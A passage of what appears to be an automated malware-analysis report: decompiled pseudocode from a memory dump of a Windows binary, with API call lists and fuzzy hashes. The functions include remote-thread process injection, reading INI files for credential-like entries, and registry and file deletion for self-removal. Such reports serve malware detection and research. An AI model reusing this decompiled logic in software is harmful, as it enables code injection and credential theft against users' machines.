				void* _t96;
				intOrPtr* _t99;
				struct _GOPHER_FIND_DATAA _t103;
				struct _GOPHER_FIND_DATAA _t107;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x423df4);
				_t99 = _a4;
				_t55 = E0041B2EB( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x423df4);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x423d8c;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E00412D46(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E004119FD(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x423df4);
					_v5 = E0041B96D( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x423df4);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E0041B2EB( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E004119C1(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x423d8c;
					_t101 = E00413AF7( &_v24, _t105);
					_t79 = E00418EB0( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E004119C1(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E00411C01(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E00411991(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E004119C1(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E00416B71(_t91, _v12, _v20);
							}
						}
					}
					E004119C1(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x0041ba8c
0x0041ba97
0x0041ba9d
0x0041baa2
0x0041baaa
0x0041bc55
0x0041bc5a
0x0041bc66
0x0041bc66
0x0041bab3
0x0041babd
0x00000000
0x00000000
0x0041bac4
0x0041baca
0x0041bade
0x0041bae1
0x0041bae3
0x0041bae5
0x0041bae5
0x0041bae5
0x0041bae8
0x0041baec
0x0041bbf7
0x0041bbf7
0x0041bbfa
0x0041bbfd
0x0041bbff
0x0041bc03
0x0041bc05
0x0041bc05
0x0041bc08
0x0041bc0a
0x0041bc0c
0x0041bc10
0x0041bc21
0x0041bc21
0x0041bc24
0x0041bc27
0x0041bc2b
0x0041bc2f
0x0041bc3c
0x0041bc41
0x0041bc41
0x0041bc41
0x0041bc41
0x0041bc2f
0x0041bc44
0x0041bc47
0x0041bc49
0x0041bc4b
0x0041bc4b
0x0041bc4d
0x0041bc4d
0x0041bc03
0x00000000
0x0041bbfd
0x0041bafa
0x0041bb14
0x0041bb17
0x0041bb1d
0x0041bb21
0x0041bbe8
0x0041bbe8
0x0041bbe8
0x0041bbe8
0x0041bbf1
0x00000000
0x0041bbf1
0x0041bb2a
0x0041bb2c
0x0041bb31
0x0041bb34
0x0041bbe3
0x00000000
0x0041bbe3
0x0041bb47
0x0041bb51
0x0041bb5f
0x0041bb64
0x0041bb66
0x0041bbcc
0x0041bbcd
0x0041bbd5
0x0041bbdb
0x00000000
0x0041bbdb
0x0041bb6e
0x0041bb73
0x0041bb76
0x0041bb78
0x00000000
0x00000000
0x0041bb7f
0x0041bb87
0x0041bb89
0x0041bb8b
0x0041bbc4
0x0041bbc7
0x00000000
0x0041bbc7
0x0041bb95
0x0041bb9b
0x0041bba1
0x0041bba3
0x0041bba5
0x0041bba8
0x0041bbaa
0x0041bbac
0x0041bbb0
0x0041bbb9
0x0041bbb9
0x0041bbb0
0x0041bbaa
0x0041bbbf
0x00000000
0x0041bad4
0x0041bad7
0x0041bc54
0x00000000
0x0041bc54

APIs

EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BA97
LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041BAFA
EnterCriticalSection.KERNEL32(00423DF4), ref: 0041BB17
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041BB9B
SetLastError.KERNEL32(00002EE4), ref: 0041BBF1
LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041BC5A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 030cce3c671089d88fdc42ca4b9042e326b394b565128cdbe15e5fa94d8b30f5
Instruction ID: 60553a864248170e0e78a408823a5834bb77a6fde5235404a22a949d5a0e1890
Opcode Fuzzy Hash: 030cce3c671089d88fdc42ca4b9042e326b394b565128cdbe15e5fa94d8b30f5
Instruction Fuzzy Hash: 3D517E71A00205ABCF11DF65C885BDE7BB4EF04354F04455AF920AB2A5D778EA81CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E025, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040E025(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E00411991(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E004119C1(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00412871(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E00411991(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E00419DD3(_t48,  &_v112);
					_t50 = 0x66;
					E00419DD3(_t50,  &_v48);
					_t52 = 0x67;
					E00419DD3(_t52,  &_v32);
					_t54 = 0x68;
					E00419DD3(_t54,  &_v88);
					_t56 = 0x69;
					E00419DD3(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E004128AD(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040DEBA(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E00419DD3(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E004126B4(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E00411DB5(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E004119C1(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x0040e025
0x0040e036
0x0040e03b
0x0040e03f
0x0040e044
0x0040e1c5
0x0040e1c5
0x0040e05c
0x0040e060
0x0040e1bb
0x00000000
0x0040e1bc
0x0040e066
0x0040e072
0x00000000
0x00000000
0x0040e082
0x0040e084
0x0040e089
0x00000000
0x0040e08f
0x0040e08f
0x0040e097
0x0040e09a
0x0040e0a0
0x0040e0a1
0x0040e0ab
0x0040e0ac
0x0040e0b6
0x0040e0b7
0x0040e0c1
0x0040e0c2
0x0040e0cc
0x0040e0cd
0x0040e0d2
0x0040e19b
0x0040e1a0
0x0040e1a5
0x0040e1aa
0x0040e0d4
0x0040e0d7
0x0040e0e8
0x0040e0f5
0x0040e0f9
0x0040e11e
0x0040e133
0x0040e13c
0x0040e13c
0x0040e14d
0x0040e15b
0x0040e161
0x0040e162
0x0040e167
0x0040e16a
0x0040e171
0x0040e172
0x0040e178
0x0040e17d
0x0040e182
0x0040e187
0x0040e189
0x0040e196
0x0040e198
0x0040e198
0x0040e196
0x0040e187
0x0040e14d
0x0040e133
0x0040e0f9
0x00000000
0x0040e1b0
0x0040e1b3
0x0040e1b8
0x00000000
0x0040e1b8
0x0040e1aa

APIs

GetPrivateProfileStringW.KERNEL32 ref: 0040E05C

Part of subcall function 00411991: HeapAlloc.KERNEL32(00000008,-00000004,0041315F,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 004119A2

StrStrIW.SHLWAPI(00000001,?), ref: 0040E0E4
StrStrIW.SHLWAPI(00000001,?), ref: 0040E0F5
GetPrivateProfileStringW.KERNEL32 ref: 0040E111
GetPrivateProfileStringW.KERNEL32 ref: 0040E12F
GetPrivateProfileStringW.KERNEL32 ref: 0040E149

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: c975e9c43a5d63f231f834c8235cd5443bf01857565579506f5ff7366bedef31
Instruction ID: 83252979ccd46096de12e032b10e53ef2222247e01eda2db6608e27594018c9a
Opcode Fuzzy Hash: c975e9c43a5d63f231f834c8235cd5443bf01857565579506f5ff7366bedef31
Instruction Fuzzy Hash: 0341903290021AFADF109BA69C11EEFBB79EF44714F144426FA04F7291DB389E558798

Uniqueness

Uniqueness Score: -1.00%

Function 0041CF1D, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041CF1D(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E0040666E(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0040666E(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x422530 =  *0x422530 | 0x00000002;
				_push(0);
				E0041C463();
				E0040A42C(_t46, _t65);
				E0041702F( &_v1680, _t65);
				E0041702F(_t51, _t65);
				_t52 =  &_v2720;
				E0040666E(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E00419D9D(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E004126F8( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00413481(__ebx, 0x474,  &_v1168);
				}
				if( *0x4229f8 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x0041cf1d
0x0041cf1d
0x0041cf2d
0x0041cf34
0x0041cf42
0x0041cf46
0x0041cf4d
0x0041cf55
0x0041cf57
0x0041cf5e
0x0041cf60
0x0041cf65
0x0041cf71
0x0041cf78
0x0041cf7f
0x0041cf86
0x0041cf93
0x0041cfaf
0x0041cfbe
0x0041cfc2
0x0041cfc6
0x0041cfc7
0x0041cfd0
0x0041cfd8
0x0041cfdd
0x0041cfe5
0x0041cfff
0x0041d004
0x0041d004
0x0041d010
0x0041d014
0x0041d014
0x0041d021

APIs

Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0041CF42
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0041CF55

Part of subcall function 0041C463: SetEvent.KERNEL32(0041CF65,00000000), ref: 0041C469
Part of subcall function 0041C463: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041C47C

Part of subcall function 0040A42C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000), ref: 0040A469
Part of subcall function 0040A42C: Sleep.KERNEL32(000001F4), ref: 0040A478
Part of subcall function 0040A42C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040A48E

Part of subcall function 0041702F: FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417060
Part of subcall function 0041702F: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 004170BB
Part of subcall function 0041702F: FindClose.KERNEL32(00000000,?,00000000), ref: 004170C6
Part of subcall function 0041702F: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 004170D2
Part of subcall function 0041702F: RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 004170D9

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0041CF93
CharToOemW.USER32 ref: 0041CFAF
CharToOemW.USER32 ref: 0041CFBE
ExitProcess.KERNEL32 ref: 0041D014

Part of subcall function 00413481: CharToOemW.USER32 ref: 004134B1
Part of subcall function 00413481: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413535

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 05653225df807d5a333cc25fc65d00e2ae1cfe9d35698bda1775804d2b3bcdce
Instruction ID: 27761b5bea5523f5187d2c27bbec9f72bf82459ee77a4c30e3cd75b118de2caf
Opcode Fuzzy Hash: 05653225df807d5a333cc25fc65d00e2ae1cfe9d35698bda1775804d2b3bcdce
Instruction Fuzzy Hash: 1321C472908344ABC230A7A1EC0AFDF7B9CEB84314F00092FF558E3191DB75A545CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004160F6, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004160F6(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E004160F6(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x00416102
0x00416105
0x0041610a
0x0041610e
0x00416118
0x0041611c
0x0041614b
0x00416151
0x00416158
0x004161a9
0x004161ab
0x004161ab
0x0041615a
0x00416163
0x00416178
0x00416193
0x004161a3
0x004161a3
0x0041614d
0x0041614d
0x0041614d
0x0041614b
0x004161b5

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 00416112
SendMessageTimeoutW.USER32 ref: 00416143
GetWindowLongW.USER32(00000000,000000F0), ref: 00416167
SetWindowLongW.USER32 ref: 00416178
GetWindowLongW.USER32(?,000000F0), ref: 00416195
SetWindowLongW.USER32 ref: 004161A3

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 00971d11707421dc6d20fdd3213c47e2d639a5c3f40799647488a0b1dca01f05
Instruction ID: 520980316efc3a1cf9a784804cb89f8823a69b0462c98f8f14fae0b48f2a3f0e
Opcode Fuzzy Hash: 00971d11707421dc6d20fdd3213c47e2d639a5c3f40799647488a0b1dca01f05
Instruction Fuzzy Hash: C121D571508315BBEB109F24CC40EAB7BA8EB84374F20472AFDB4923F2DA74D9448B95

Uniqueness

Uniqueness Score: -1.00%

Function 00416BD6, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00416BD6(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x00416bd6
0x00416be9
0x00416bfb
0x00416c01
0x00416c07
0x00416c77
0x00416c77
0x00416c09
0x00416c0e
0x00416c16
0x00416c6e
0x00416c71
0x00000000
0x00416c1d
0x00416c1d
0x00416c20
0x00416c25
0x00416c36
0x00416c3c
0x00416c40
0x00000000
0x00416c42
0x00416c56
0x00416c68
0x00000000
0x00000000
0x00000000
0x00000000
0x00416c56
0x00416c27
0x00416c27
0x00416c29
0x00416c29
0x00416c29
0x00416c25
0x00416c16
0x00416c7b

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416BFB
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C0E
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00406B68,?,?,00000000), ref: 00416C36
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00406B68,?,?,00000000), ref: 00416C4E
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00406B68,?,?,00000000), ref: 00416C68
CloseHandle.KERNEL32(?,?,?,?,?,00406B68,?,?,00000000), ref: 00416C71

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 333e3b655cb08df1a997c1f841037d108384134b0dea949c7aa4095abb27387c
Instruction ID: 3e7ca0db43b45abdae20cf9b52ae5bf4cb520d0f90c453c73caacc185174bf89
Opcode Fuzzy Hash: 333e3b655cb08df1a997c1f841037d108384134b0dea949c7aa4095abb27387c
Instruction Fuzzy Hash: 9111B675100600BFDB218F21CD49EAB7BB8EB45700B10492EF5D2E52B0E331E890CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040C24F, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040C24F(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x422530 & 0x00000004) == 0 || E00406473() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x423e7c);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x0040c25a
0x0040c25e
0x0040c2d0
0x00000000
0x0040c269
0x0040c275
0x0040c279
0x00000000
0x0040c280
0x0040c28f
0x0040c299
0x0040c29f
0x0040c2af
0x0040c2b7
0x0040c2be
0x0040c2c1
0x0040c2c7
0x0040c2ca
0x0040c2cd
0x00000000
0x0040c2cd
0x0040c279

APIs

GetUpdateRgn.USER32 ref: 0040C2D7

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

TlsGetValue.KERNEL32 ref: 0040C26F
SetRectRgn.GDI32(?,?,?,?,?), ref: 0040C28F
SaveDC.GDI32(?), ref: 0040C29F
SendMessageW.USER32(?,00000014,?,00000000), ref: 0040C2AF
RestoreDC.GDI32(?,00000000), ref: 0040C2C1

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: bed6a7ac560ef741420af58551c67518777da336020a6dc14124bb83a8520ac2
Instruction ID: 1c40d8dae3581bbcce3c9806edcbb74b1e915ebbae805969e79d58ae25f1315a
Opcode Fuzzy Hash: bed6a7ac560ef741420af58551c67518777da336020a6dc14124bb83a8520ac2
Instruction Fuzzy Hash: 29119E31040740EBDB325FA1ED88F96BBA6FB18710F044A69FA86A19B1C3359450DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00419F95, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00419F95(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00406388(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422544 + E00406B38, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00419f95
0x00419f98
0x00419fa6
0x00419faf
0x00419fb1
0x00419fb3
0x00419fb5
0x00419fba
0x00419fbf
0x00419fc3
0x00419fd7
0x00419fdd
0x00419fe2
0x0041a007
0x00419fe4
0x00419fea
0x00419ff3
0x00419ff9
0x00419ff9
0x00419fe2
0x0041a00e
0x0041a014
0x0041a01b

APIs

OpenProcess.KERNEL32(0000047A,00000000,7519F560,00000000,7519F560,?,?,0041A157,?,?,00000000), ref: 00419FA9
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0082907C,00000000,00000000,00000000), ref: 00419FD7
WaitForSingleObject.KERNEL32(00000000,00002710,?,0041A157,?,?,00000000), ref: 00419FEA
CloseHandle.KERNEL32(7519F560,?,0041A157,?,?,00000000), ref: 00419FF3
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,0041A157,?,?,00000000), ref: 0041A007
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0041A157,?,?,00000000), ref: 0041A00E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 0bc17df3fb1c5614fc7e5b29a29155aa7ff187c1e1a35fce4eefcbf85d486557
Instruction ID: 820b828a1115122de494b6f114a98d6cfc6e6ceebc382e77795ce46be95bfb5e
Opcode Fuzzy Hash: 0bc17df3fb1c5614fc7e5b29a29155aa7ff187c1e1a35fce4eefcbf85d486557
Instruction Fuzzy Hash: BE019EB2104218BFE7112F649DCCDEF3E6CDB49398B04406AF902F6260C6794C968679

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFD9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040AFD9(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
